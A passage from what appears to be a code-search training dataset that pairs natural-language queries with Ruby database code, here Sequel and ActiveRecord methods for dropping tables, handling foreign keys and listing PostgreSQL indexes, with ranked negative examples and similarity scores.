"def remove_table_not_exist_foreign_keys\n @foreign_keys.each do |table, foreign_keys|\n foreign_keys.delete_if do |key|\n if key.is_a?(String) && key =~ /_id$/\n class_name = Prepares.model_associations.get_association_class_name(table, key[0..-4])\n class_name ? !@table_nodes[class_name.gsub('::', '').tableize] : !@table_nodes[key[0..-4].pluralize]\n end\n end\n end\n end",
"def foreign_key_list(table, opts=OPTS)\n m = output_identifier_meth\n schema, _ = opts.fetch(:schema, schema_and_table(table))\n\n h = {}\n fklod_map = FOREIGN_KEY_LIST_ON_DELETE_MAP \n reverse = opts[:reverse]\n\n (reverse ? _reverse_foreign_key_list_ds : _foreign_key_list_ds).where_each(Sequel[:cl][:oid]=>regclass_oid(table)) do |row|\n if reverse\n key = [row[:schema], row[:table], row[:name]]\n else\n key = row[:name]\n end\n\n if r = h[key]\n r[:columns] << m.call(row[:column])\n r[:key] << m.call(row[:refcolumn])\n else\n entry = h[key] = {\n :name=>m.call(row[:name]),\n :columns=>[m.call(row[:column])],\n :key=>[m.call(row[:refcolumn])],\n :on_update=>fklod_map[row[:on_update]],\n :on_delete=>fklod_map[row[:on_delete]],\n :deferrable=>row[:deferrable],\n :table=>schema ? SQL::QualifiedIdentifier.new(m.call(row[:schema]), m.call(row[:table])) : m.call(row[:table]),\n }\n\n unless schema\n # If not combining schema information into the :table entry\n # include it as a separate entry.\n entry[:schema] = m.call(row[:schema])\n end\n end\n end\n\n h.values\n end",
"def drop_foreign_key_if_present(detached_partition, foreign_key)\n # It is important to only drop one foreign key per transaction.\n # Dropping a foreign key takes an ACCESS EXCLUSIVE lock on both tables participating in the foreign key.\n\n partition_identifier = qualify_partition_name(detached_partition.table_name)\n with_lock_retries do\n connection.transaction(requires_new: false) do\n next unless try_lock_detached_partition(detached_partition.id)\n\n # Another process may have already dropped this foreign key\n next unless PostgresForeignKey.by_constrained_table_identifier(partition_identifier).where(name: foreign_key.name).exists?\n\n connection.execute(\"ALTER TABLE #{connection.quote_table_name(partition_identifier)} DROP CONSTRAINT #{connection.quote_table_name(foreign_key.name)}\")\n\n Gitlab::AppLogger.info(message: \"Dropped foreign key for previously detached partition\",\n partition_name: detached_partition.table_name,\n referenced_table_name: foreign_key.referenced_table_identifier,\n foreign_key_name: foreign_key.name)\n end\n end\n end",
"def _foreign_key_list_ds\n @_foreign_key_list_ds ||= __foreign_key_list_ds(false)\n end",
"def foreign_key_setter\n # note: You can't check if this association stores foreign key\n # See HasOne and HasMany binding, they referenced foreign_key_setter\n @foreign_key_setter ||= \"#{foreign_key}=\" if foreign_key\n end",
"def collect_foreign_key_references(metadata, foreign_keys, row)\n schema = metadata.tableSchema\n\n # Add row as foreignKey source\n Array(schema ? schema.foreignKeys : []).each do |fk|\n colRef = Array(fk['columnReference'])\n\n # Referenced cells, in order\n cells = colRef.map {|n| row.values.detect {|cell| cell.column.name == n}}.compact\n cell_values = cells.map {|cell| cell.stringValue unless cell.stringValue.to_s.empty?}.compact\n next if cell_values.empty? # Don't record if empty\n (fk[:reference_from] ||= {})[cell_values] ||= row\n end\n\n # Add row as foreignKey dest\n Array(foreign_keys).each do |fk|\n colRef = Array(fk['reference']['columnReference'])\n\n # Referenced cells, in order\n cells = colRef.map {|n| row.values.detect {|cell| cell.column.name == n}}.compact\n fk[:reference_to] ||= {}\n cell_values = cells.map {|cell| cell.stringValue unless cell.stringValue.to_s.empty?}.compact\n next if cell_values.empty? # Don't record if empty\n log_error \"Table #{metadata.url} row #{row.number}(src #{row.sourceNumber}): found duplicate foreign key target: #{cell_values.map(&:to_s).inspect}\" if fk[:reference_to][cell_values]\n fk[:reference_to][cell_values] ||= row\n end\n end",
"def is_constraint?(trigger_definition)\n !!(trigger_definition =~ /^CREATE CONSTRAINT TRIGGER/)\n end",
"def scaf_foreign_keys\n scaf_belongs_tos.collect(&:primary_key_name)\n end",
"def create_constraints(drop = nil)\n contraints = {\n \"Page\" => [:page_id],\n \"Term\" => [:uri]\n }\n contraints.each do |label, fields|\n fields.each do |field|\n begin\n name = 'o'\n name = label.downcase if drop && drop == :drop\n query(\n \"#{drop && drop == :drop ? 'DROP' : 'CREATE'} CONSTRAINT ON (#{name}:#{label}) ASSERT #{name}.#{field} IS UNIQUE;\"\n )\n rescue Neography::NeographyError => e\n raise e unless e.message =~ /already exists/ || e.message =~ /No such constraint/\n end\n end\n end\n end",
"def conventional_foreign_key?\n parent_table == naming_conventions.parent_table_for(foreign_key)\n end",
"def foreign_key_column_exists?\n !! model_class.columns.detect { |c| c.name.strip.downcase == foreign_key_column_name.strip.downcase }\n end",
"def test_foreign_key_violations_on_insert_are_translated_to_specific_exception\n error = assert_raises(ActiveRecord::InvalidForeignKey) do\n insert_into_fk_test_has_fk\n end\n\n assert_not_nil error.cause\n end",
"def foreign_key(*attributes)\n self.foreign_keys += attributes\n end",
"def coerce_constraint_definition(defn)\n defn = coerce_symbolized_hash(defn)\n defn[:type] = coerce_name(defn[:type])\n \n case type = defn[:type]\n when :primary_key, :candidate_key\n has_exactly_hash_keys!(defn, :type, :attributes)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n when :foreign_key\n if defn.key?(:key)\n has_exactly_hash_keys!(defn, :type, :attributes, :references, :key)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n defn[:references] = coerce_name(defn[:references])\n defn[:key] = coerce_name(defn[:key])\n else\n has_exactly_hash_keys!(defn, :type, :attributes, :references)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n defn[:references] = coerce_name(defn[:references])\n end\n else\n invalid!(\"unknown constraint type #{type}\")\n end\n defn\n end"
] |
[
"0.7820092",
"0.7030612",
"0.7030612",
"0.68069375",
"0.677845",
"0.67621166",
"0.67621166",
"0.674389",
"0.6702672",
"0.66943294",
"0.66943294",
"0.661967",
"0.65737766",
"0.65495896",
"0.65211123",
"0.6496953",
"0.6462772",
"0.64350355",
"0.641176",
"0.6408627",
"0.6408627",
"0.6375203",
"0.6332843",
"0.6328469",
"0.62928754",
"0.6245146",
"0.6245146",
"0.62337047",
"0.622268",
"0.62082416",
"0.6202808",
"0.62022525",
"0.61982316",
"0.6193004",
"0.61910963",
"0.6175132",
"0.61710376",
"0.61440414",
"0.6101781",
"0.6082895",
"0.6082895",
"0.6007326",
"0.59885925",
"0.5982686",
"0.5940646",
"0.591689",
"0.5915288",
"0.5909184",
"0.5900809",
"0.5895258",
"0.5850669",
"0.5825423",
"0.5811268",
"0.5810178",
"0.5800245",
"0.5796475",
"0.57755864",
"0.5742172",
"0.57384354",
"0.5735755",
"0.57291335",
"0.57182795",
"0.56885535",
"0.56856936",
"0.56769484",
"0.5674375",
"0.5673104",
"0.5658986",
"0.56522936",
"0.5651424",
"0.5621732",
"0.5619935",
"0.5604043",
"0.5595496",
"0.5590376",
"0.55789447",
"0.5554833",
"0.5549577",
"0.55490196",
"0.5546519",
"0.55086434",
"0.55083907",
"0.5500649",
"0.54919064",
"0.54907835",
"0.5467625",
"0.54675674",
"0.54642624",
"0.54615796",
"0.5456547",
"0.54455686",
"0.54361606",
"0.5403899",
"0.5379813",
"0.53779525",
"0.5367765",
"0.534982",
"0.5328819",
"0.53261995"
] |
0.8199576
|
1
|
PostgreSQL supports DROP TABLE IF EXISTS.
|
def supports_drop_table_if_exists?
true
end
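For context, a minimal Sequel sketch (assuming the Sequel gem on PostgreSQL and a hypothetical connection URL): when the adapter reports this capability, drop_table? can issue a single DROP TABLE IF EXISTS rather than probing table_exists? first, as the drop_table? helper among the negatives below shows.

require 'sequel'

DB = Sequel.connect('postgres://localhost/mydb') # hypothetical connection URL

DB.drop_table?(:staging_rows) # emits: DROP TABLE IF EXISTS "staging_rows"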
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_drop_table_if_exists\n connection.create_table(:testings)\n assert connection.table_exists?(:testings)\n connection.drop_table(:testings, if_exists: true)\n assert_not connection.table_exists?(:testings)\n end",
"def drop_table_sql(name, options)\n \"DROP TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def drop_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"testdb\")\n c.exec \"DROP TABLE products;\"\n c.close\nend",
"def supports_drop_table_if_exists?\n supports_create_table_if_not_exists?\n end",
"def drop_table(table_name = temporary_table_name)\n ::RailsRedshiftReplicator.connection.exec \"drop table if exists #{table_name}\"\n end",
"def destroy!\n drop_ddl = tables.map(&:name).map do |t|\n \"drop table if exists #{t};\\n\"\n end.join\n ActiveRecord::Base.connection.execute(drop_ddl)\n end",
"def drop_table_statement(repository, model)\n \"DROP TABLE #{quote_table_name(model.storage_name(repository.name))}\"\n end",
"def drop_table?(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS\n if supports_drop_table_if_exists?\n options = options.merge(:if_exists=>true)\n names.each do |name|\n drop_table(name, options)\n end\n else\n names.each do |name|\n drop_table(name, options) if table_exists?(name)\n end\n end\n nil\n end",
"def drop_table(table_name, **options)\n schema_cache.clear_data_source_cache!(table_name.to_s)\n execute \"DROP#{' TEMPORARY' if options[:temporary]} TABLE#{' IF EXISTS' if options[:if_exists]} #{quote_table_name(table_name)}#{' CASCADE' if options[:force] == :cascade}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_schema_table(name)}\"\n end",
"def drop_table_sql(name)\n \"DROP TABLE #{quote_identifier(name)}\"\n end",
"def drop(db)\n\tif $table_exists\n\t\tdb.execute(\"DROP TABLE items;\")\n\t\t$table_exists = false\n\t\tputs \"\\nTable successfully deleted.\"\n\telse\n\t\tputs \"\\nTable successfully deleted.\"\n\tend\nend",
"def drop!(db, colls = nil)\n db.in_transaction do |conn|\n schema_tables(conn).each do |table|\n conn.exec \"DROP TABLE IF EXISTS #{table}\"\n end\n end\n end",
"def drop_movies_table\n c = connect\n c.exec \"DROP TABLE IF EXISTS movies;\" \n c.close\nend",
"def delete_table\n table_name = self.to_s.pluralize.underscore\n DATABASE.execute(\"DROP TABLE #{table_name}\")\n end",
"def prepare_db_for_restore\n raise \"restore unimplemented for #{adapter}\" unless (adapter = @db_conf[:adapter]) == 'postgresql'\n query = \"SELECT table_name FROM information_schema.tables WHERE table_schema='public' AND table_type='BASE TABLE'\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n tables = `#{cmd}`\n\n query = \"DROP TABLE #{tables.map(&:chomp).map(&:strip).reject(&:empty?).join(\", \")} CASCADE\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n `#{cmd}`\n end",
"def destroy\n [METADATA_TABLE_NAME, RUN_HISTORY_TABLE_NAME,\n DISABLED_MONITOR_TABLE_NAME, MONITOR_INFO_TABLE_NAME].each do |table|\n @db.execute(\"DROP TABLE IF EXISTS #{table}\")\n end\n\n create()\n end",
"def drop_table\n self.connection.drop_table table_name\n end",
"def drop_tablespace(name, options = {})\n sql = 'DROP TABLESPACE '\n sql << 'IF EXISTS ' if options[:if_exists]\n sql << quote_tablespace(name)\n\n execute(\"#{sql};\")\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name) # :nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE IF EXISTS #{quote_table_name(name)}\"\n end",
"def drop_versioned_table\n self.connection.drop_table versioned_table_name\n end",
"def dropUserTable(tableName)\n @conn.exec(\"DROP TABLE #{tableName}\")\n end",
"def drop_table?\n db.drop_table?(table_name)\n end",
"def drop_database(name)\n execute \"DROP DATABASE IF EXISTS #{name}\" \n end",
"def drop_and_create_schema_migrations_table\n sql = [\n \"USE #{@database}\",\n 'DROP TABLE IF EXISTS schema_migrations',\n 'CREATE TABLE schema_migrations ( version varchar(255) COLLATE utf8_unicode_ci NOT NULL, UNIQUE KEY unique_schema_migrations (version)) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci'\n ]\n\n run_commands(sql)\n end",
"def drop_table\n db.drop_table(table_name)\n end",
"def drop_database(name) #:nodoc:\n execute \"DROP DATABASE #{quote_table_name(name)}\"\n end",
"def drop_table(name)\n not_exist(name)\n\n ORM::DBConnection.new(model_name(name)).remove_table(name)\n File.delete(\"app/services/db/tables/#{name}.json\")\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def dropUserTable\n @conn.exec(\"DROPE users\")\n end",
"def replace_statement(target, stage)\n <<-SQLREPLACE\n begin transaction;\n drop table #{target};\n alter table #{stage} rename to #{target};\n end transaction;\n SQLREPLACE\n end",
"def truncate_db\n drop_table\n create_table\n end",
"def purge\n @db.execute( \"DELETE FROM #{TABLE_NAME};\" )\n end",
"def create_cache_table(database_url_or_options = {}, options = {})\n @pg.exec(%{\n CREATE UNLOGGED TABLE #{@table_name} (\n key text UNIQUE NOT NULL,\n value bytea NULL\n );\n })\n return true\n end",
"def drop_tables!\n migrate(:down)\n end",
"def drop_table(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS \n names.each do |n|\n execute_ddl(drop_table_sql(n, options))\n remove_cached_schema(n)\n end\n nil\n end",
"def drop_table(tablename)\r\n raise(ArgumentError, 'Table name must be a symbol!') unless \\\r\n tablename.is_a?(Symbol)\r\n raise \"Table does not exist!\" unless table_exists?(tablename)\r\n @table_hash.delete(tablename)\r\n\r\n return @engine.delete_table(tablename)\r\n end",
"def delete_traps\n @db.execute(\"DROP TABLE Traps\")\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def clear\n table_ = [keyspace, table].compact.join '.'\n statement = \"DROP TABLE IF EXISTS #{table_} ;\"\n session.execute(statement)\n end",
"def supports_create_table_if_not_exists?\n true\n end",
"def drop_table(*names)\n names.each {|n| execute(drop_table_sql(n))}\n end",
"def supports_create_table_if_not_exists?\n false\n end",
"def drop_sequence(name)\n self.execute(\"DROP TABLE IF EXISTS %s_sequence\" % name)\n end",
"def truncate_table\n\t\t\t transaction { connection.execute(\"TRUNCATE TABLE #{quoted_table_name};\") }\n\t\t end",
"def drop_prejoin_fact_table\r\n connection.drop_table(prejoined_table_name) if connection.tables.include?(prejoined_table_name)\r\n end",
"def setup_test_database\n connection = PG.connect(dbname: 'chitter_challenge_test')\n connection.exec(\"TRUNCATE peeps;\")\nend",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def delete()\n db = PG connect( {dbname: 'bounty_hunter',\n host: 'localhost'\n })\n sql = 'DELETE from bounty_hunter'\n db.prepare('delete_one', sql)\n db.exec_prepared('delete_one', value)\n db.close()\nend",
"def sql_for_remove\n \"DROP FUNCTION IF EXISTS #{proname}(#{get_function_args})\"\n end",
"def reset\n tables = MODELS + [ENV['SCHEMA_TABLE']]\n tables.each { |t|\n DB << \"DROP TABLE IF EXISTS #{t.inspect};\"\n }\nend",
"def drop_schema(schema_name, options = {})\n execute \"DROP SCHEMA#{' IF EXISTS' if options[:if_exists]} #{quote_schema_name(schema_name)} CASCADE\"\n end",
"def drop_schema schema_name\n execute \"DROP SCHEMA #{schema_name} CASCADE\"\n end",
"def drop_table(klass)\n # Remove leftover data from some join tabkes.\n klass.relations.each do |rel|\n if rel.class.to_s == \"Og::JoinsMany\" and rel.join_table\n target_class = rel.target_class\n exec \"DELETE FROM #{rel.join_table}\"\n end\n end\n exec \"DROP TABLE #{klass.table}\"\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)}\"\n end",
"def delete_kiosks\n @db.execute(\"DROP TABLE Kiosks\")\n end",
"def set_up_test_database \n connection = PG.connect(dbname: 'chitter_peeps_test')\n #clear the peeps table\n connection.exec(\"TRUNCATE peeps;\")\nend",
"def drop_sql\n raise NotImplementedError, \"DatabaseSymbol should not be instanciated\"\n end",
"def delete_from_table(db,id,table_name)\n db.execute(\"DELETE FROM #{table_name} WHERE #{table_name}.id =#{id}\")\nend",
"def drop_all_tables!\n ActiveRecord::Base.descendants.each do |model|\n begin\n ActiveRecord::Schema.define do\n drop_table model\n end if model.table_exists?\n rescue\n end\n end and true\nend",
"def delete_table(table)\r\n referenced_by = references(table)\r\n if !referenced_by.empty?\r\n puts \"unable to delete table \\'#{table}\\' because it is referenced by table(s):\"\r\n referenced_by.each{|table_name| puts \"#{table_name}\"}\r\n false\r\n elsif table_exists?(table)\r\n delete_table_cmd = \"DROP TABLE IF EXISTS #{table}\"\r\n @db.execute(delete_table_cmd)\r\n puts \"#{table} was deleted\"\r\n true\r\n end\r\n end",
"def drop_schema_sql(name, opts = {})\n \"DROP SCHEMA #{quote_identifier(name)} CASCADE\"\n end",
"def drop_database_sql(name, opts = {})\n \"DROP DATABASE #{quote_identifier(name)}\"\n end",
"def down\n execute <<-SQL\n DROP TABLE event_registrations;\n SQL\n\n execute <<-SQL\n DROP TABLE members;\n SQL\n\n execute <<-SQL\n DROP TABLE events;\n SQL\n\n execute <<-SQL\n DROP TABLE treatment_logs;\n SQL\n\n execute <<-SQL\n DROP TABLE feeding_logs;\n SQL\n\n execute <<-SQL\n DROP TABLE employees;\n SQL\n\n execute <<-SQL\n DROP TABLE animals;\n SQL\n\n execute <<-SQL\n DROP TABLE tanks;\n SQL\n\n execute <<-SQL\n DROP TABLE habitats;\n SQL\n end",
"def delete_database(connection_string, db_name)\n drop_sql = <<-SQL\n DROP DATABASE #{db_name};\n SQL\n\n run \"#{connection_string} --execute=\\\"#{drop_sql}\\\"\"\nend",
"def remove_tables_from_publication(name, tables)\n typed_exec(\"ALTER PUBLICATION #{connection.quote_ident(name)} DROP TABLE #{safe_list(tables)}\")\n end",
"def resolve_ids_cleanup_sql(source, temptable)\n\t\tsource.connection.execute \"\n\t\tDELETE FROM unresolved_ids \n\t\t WHERE EXISTS (SELECT 1 FROM #{temptable} \n\t\t WHERE unresolved_id = unresolved_ids.id)\n\t\t AND source_id = #{source.id};\"\n\n\t\tsource.connection.execute \"DROP TABLE #{temptable}\"\n\tend",
"def delete_table(table_id); delete(\"tables/#{table_id}\"); nil; end",
"def db_remove\n \"DELETE\" + from_table_where + sql_match_conditions\n end",
"def drop\n\t\tActiveRecord::Base.connection.execute \"SET AUTOCOMMIT=0\"\n\t\tActiveRecord::Base.connection.execute \"SET FOREIGN_KEY_CHECKS=0\"\n\n self.change_schema_to 'information_schema';\n @result[:deleted] = []\n \n if request[:remove_all]\n #remove all tables\n @tables = ActiveRecord::Base.connection.select_all \"select TABLE_NAME table_name from `TABLES` where `TABLE_SCHEMA`='#{request[:db_name]}'\"\n self.change_schema_to request[:db_name];\n \n @tables.each do |table|\n ActiveRecord::Base.connection.execute \"drop table `#{table[\"table_name\"]}`\"\n @result[:deleted].push table[\"table_name\"];\n end\n else\n self.change_schema_to request[:db_name];\n ActiveRecord::Base.connection.execute \"drop table `#{request[:key]}`\";\n @result[:deleted].push request[:key];\n end\n \n self.change_schema_to 'information_schema';\n @result[:type] = 'table'\n render json: @result\n end",
"def delete table\n table = table.to_sym\n @lookup = @lookup.reject { |k, v| k == table }\n @schema = @schema.reject { |k, v| k == table }\n nil\n end",
"def delete_buttons\n @db.execute(\"DROP TABLE Buttons\")\n end",
"def delete_table instance_id, table_id\n execute do\n tables.delete_table(\n table_path(instance_id, table_id)\n )\n end\n end",
"def down\n drop_table TABLE_NAME\n end",
"def delete\n table_name = self.class.to_s.pluralize.underscore\n DATABASE.execute(\"DELETE FROM #{table_name} WHERE id = #{@id};\")\n end",
"def drop_sequence_statement(repository, property)\n \"DROP SEQUENCE IF EXISTS #{quote_column_name(sequence_name(repository, property))}\"\n end",
"def delete_queries\n [\n \"DROP TRIGGER tr_#{suffix} ON #{src_table};\",\n \"DROP FUNCTION fn_#{suffix}();\",\n \"DROP TRIGGER tr_#{suffix}_cleaner ON #{surveys_table};\",\n \"DROP FUNCTION fn_#{suffix}_cleaner();\"\n ]\n end",
"def create_table?(*args, &block)\n create_table(*args, &block) unless table_exists?\n end",
"def run\n ActiveRecord::Base.connection.create_table :not_deleted do |table|\n table.string :name\n end\n false\n end",
"def db_deleter(database, id)\n database.execute(\"DELETE FROM wine_cellar where id=#{id}\")\nend",
"def resetUntappdTable\n @db.execute \"DROP TABLE IF EXISTS #{@untappdTable};\"\n @db.execute <<-SQL\n CREATE TABLE \"#{@untappdTable}\" (\n id float,\n name varchar(40),\n brewery varchar(60),\n beer_label varchar(40),\n abv float,\n ibu float,\n style varchar(40),\n description varchar(60),\n rating_score float,\n rating_count float\n );\n SQL\n end",
"def unlink\n self.transaction do\n self.class.factory.model.connection.execute <<-SQL\n ALTER TABLE #{name} NO INHERIT #{self.class.factory.model.table_name};\n ALTER TABLE #{name} RENAME TO #{name}_unlinked;\n SQL\n self.destroy\n end\n end",
"def drop_function_sql(name, opts=OPTS)\n \"DROP FUNCTION#{' IF EXISTS' if opts[:if_exists]} #{name}#{sql_function_args(opts[:args])}#{' CASCADE' if opts[:cascade]}\"\n end",
"def delete_table(db)\n\tputs ('Are you sure you want to wipe the table? (y/n)')\n\tif gets.chomp == 'y'\n\t\tdb.execute(\"DELETE FROM todo\")\n\t\tdb.execute(\"DELETE FROM log\") \n\tend\nend",
"def delete\n table_name = self.class.to_s.pluralize.underscore\n DATABASE.execute(\"DELETE FROM #{table_name} WHERE id = #{@id};\")\n end",
"def down\n \tdrop_table :solution_submissions\n\n # \texecute <<-SQL\n # \t\tDROP TYPE s_status;\n # \tSQL\n\n # \texecute <<-SQL\n # \t\tDROP TYPE lang;\n # \tSQL\n\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def delete_sql(sql, name = nil)\n result = execute(sql, name)\n result.cmd_tuples\n end",
"def drop_table(table_name, options = {})\n table_name, options = extract_table_options(table_name, options)\n super(table_name, **options)\n end",
"def delete(sql, name = nil) end",
"def delete_table\n TinyDyno::Adapter.delete_table(table_name: self.table_name)\n end",
"def supports_create_table_if_not_exists?\n server_version >= 90100\n end",
"def drop_sequence_sql(name)\n \"DROP SEQUENCE #{name}\"\n end",
"def teardown_test_db\n ActiveRecord::Base.connection.tables.each do |t|\n ActiveRecord::Base.connection.drop_table(t)\n end\nend",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def drop_index_sql(table, op)\n sch, _ = schema_and_table(table)\n \"DROP INDEX#{' CONCURRENTLY' if op[:concurrently]}#{' IF EXISTS' if op[:if_exists]} #{\"#{quote_identifier(sch)}.\" if sch}#{quote_identifier(op[:name] || default_index_name(table, op[:columns]))}#{' CASCADE' if op[:cascade]}\"\n end"
] |
[
"0.75406855",
"0.7447282",
"0.7352017",
"0.7257186",
"0.70561236",
"0.70199263",
"0.7016024",
"0.6948586",
"0.692693",
"0.69207895",
"0.69183964",
"0.68844426",
"0.68596363",
"0.68555564",
"0.68210626",
"0.67926085",
"0.6784143",
"0.6715057",
"0.6701895",
"0.66934294",
"0.6678893",
"0.6644413",
"0.6629832",
"0.6627834",
"0.65985215",
"0.65487885",
"0.65464425",
"0.6531216",
"0.64346707",
"0.6429133",
"0.6393106",
"0.6392981",
"0.63272536",
"0.63072056",
"0.62911576",
"0.62678427",
"0.6252546",
"0.6238612",
"0.6232385",
"0.6228497",
"0.61967397",
"0.61760646",
"0.616471",
"0.61316115",
"0.61201084",
"0.61179876",
"0.60794055",
"0.6030585",
"0.60291374",
"0.6016082",
"0.60159045",
"0.599908",
"0.5975881",
"0.59555686",
"0.59471136",
"0.5945929",
"0.5945211",
"0.59257483",
"0.5908614",
"0.5901338",
"0.5900731",
"0.5898081",
"0.58940965",
"0.5888433",
"0.58785766",
"0.58652365",
"0.58598775",
"0.58524907",
"0.5843604",
"0.58355373",
"0.5821793",
"0.5803052",
"0.5802927",
"0.57903004",
"0.57637644",
"0.5758638",
"0.5756406",
"0.5741043",
"0.5738358",
"0.57284963",
"0.57214457",
"0.5720815",
"0.5706246",
"0.56807363",
"0.56802183",
"0.5677386",
"0.5660743",
"0.56545347",
"0.5654072",
"0.56540436",
"0.56540436",
"0.5650332",
"0.5634317",
"0.56332994",
"0.5629638",
"0.5621985",
"0.56194186",
"0.5617826",
"0.5616626"
] |
0.7773049
|
1
|
PostgreSQL supports partial indexes.
|
def supports_partial_indexes?
true
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def supports_partial_indexes?\n false\n end",
"def supports_partial_index?\n false\n end",
"def supports_partial_index?\n false\n end",
"def indexes(table_name, name = nil)\n result = query(<<-SQL, 'SCHEMA')\n SELECT distinct i.relname, d.indisunique, d.indkey, pg_get_indexdef(d.indexrelid), t.oid\n FROM pg_class t\n INNER JOIN pg_index d ON t.oid = d.indrelid\n INNER JOIN pg_class i ON d.indexrelid = i.oid\n WHERE i.relkind = 'i'\n AND d.indisprimary = 'f'\n AND t.relname = '#{table_name}'\n AND i.relnamespace IN (SELECT oid FROM pg_namespace WHERE nspname = ANY (current_schemas(false)) )\n ORDER BY i.relname\n SQL\n\n result.map do |row|\n index_name = row[0]\n unique = row[1] == 't'\n indkey = row[2].split(\" \")\n inddef = row[3]\n oid = row[4]\n\n columns = query(<<-SQL, \"SCHEMA\")\n SELECT a.attnum, a.attname, t.typname\n FROM pg_attribute a, pg_type t\n WHERE a.attrelid = #{oid}\n AND a.attnum IN (#{indkey.join(\",\")})\n AND a.atttypid = t.oid\n SQL\n columns = columns.inject({}){ |h, r| h[r[0].to_s] = [r[1], r[2]]; h }\n column_names = columns.values_at(*indkey).compact.map{ |a| a[0] }\n\n unless column_names.empty?\n # add info on sort order for columns (only desc order is explicitly specified, asc is the default)\n desc_order_columns = inddef.scan(/(\\w+) DESC/).flatten\n orders = desc_order_columns.any? ? Hash[desc_order_columns.map {|order_column| [order_column, :desc]}] : {}\n where = inddef.scan(/WHERE (.+)$/).flatten[0]\n # using = inddef.scan(/USING (.+?) /).flatten[0].to_sym\n\n spatial = inddef =~ /using\\s+gist/i &&\n columns.size == 1 &&\n %w[geometry geography].include?(columns.values.first[1])\n\n # IndexDefinition.new(table_name, index_name, unique, column_names, [], orders, where, nil, using)\n ::RGeo::ActiveRecord::SpatialIndexDefinition.new(table_name, index_name, unique, column_names, [], orders, where, !!spatial)\n end\n end.compact\n end",
"def indexed?(table, column); end",
"def index_definition_sql(table_name, index)\n\t raise Error, \"Partial indexes are not supported for this database\" if index[:where]\n\n\t # Basic index creation DDL.\n\t sql = [\"CREATE\"]\n\t case index[:type]\n\t when :bitmap\n\t\t raise Error, \"Bitmap indexes cannot be unique\" if index[:unique]\n\t sql << 'BITMAP'\n\t when NilClass, :normal\n\t sql << 'UNIQUE' if index[:unique]\n\t else\n\t raise Error, \"Index type #{index[:type].inspect} is not supported for this database\"\n\t end\n\t index_name = index[:name] || default_index_name(table_name, index[:columns])\n\t qualified_table_name = quote_schema_table table_name\n\t sql << \"INDEX #{quote_identifier(index_name)} ON #{qualified_table_name}\"\n\t \n\t # Index columns and join indexes.\n index_join, index_columns = *index.values_at(:join,:columns)\n\t sql << literal(index_columns)\n if index_join\n\t\t raise Error, \"Join clauses are only supported for bitmap indexes\" if index[:type]!=:bitmap\n\t\t sql << \"FROM #{qualified_table_name},\"\n\t\t sql << index_columns.map{|k| quote_identifier schema_and_table(k).first }.uniq.join(', ')\n\t\t \n\t\t # TODO: Document this short-hand syntax: {:columns=>[:ref_table__ref_column], :join=>[:fk_column]}\n if Array===index_join and index_join.length==index_columns.length and index_join.all?{|k| Symbol===k}\n index_join = Hash[ index_join.map{|k| :\"#{table_name}__#{k}\" }.zip(index_columns) ]\n end\n\n\t sql << \"WHERE #{filter_expr(index_join)}\"\n\t end\n\t \n\t # Index attributes and options.\n\t sql << 'LOCAL' if index[:partitioned]\n\t sql << flag_option_sql(index, :parallel)\n\t sql << flag_option_sql(index, :logging)\n\t sql << \"TABLESPACE #{quote_identifier(index[:tablespace])}\" if index[:tablespace]\n\t sql << flag_option_sql(index, :visible, 'INVISIBLE')\n\t sql << compress_option_sql(index)\n\t sql << index[:options] if String === index[:options]\n\t sql << 'UNUSABLE' if FalseClass === index[:valid]\n\t sql.compact.join ' '\n\t end",
"def indexes\n select_all( <<-SQL\n SELECT\n t.relname AS table,\n ix.relname AS name,\n regexp_replace(pg_get_indexdef(indexrelid), '^[^\\\\(]*\\\\((.*)\\\\)$', '\\\\1') AS columns,\n regexp_replace(pg_get_indexdef(indexrelid), '.* USING ([^ ]*) \\\\(.*', '\\\\1') AS using,\n indisunique AS unique,\n indisprimary AS primary,\n indisvalid AS valid,\n indexprs::text,\n indpred::text,\n pg_get_indexdef(indexrelid) AS definition\n FROM\n pg_index i\n INNER JOIN\n pg_class t ON t.oid = i.indrelid\n INNER JOIN\n pg_class ix ON ix.oid = i.indexrelid\n ORDER BY\n 1, 2\n SQL\n ).map { |v| v[\"columns\"] = v[\"columns\"].sub(\") WHERE (\", \" WHERE \").split(\", \"); v }\n end",
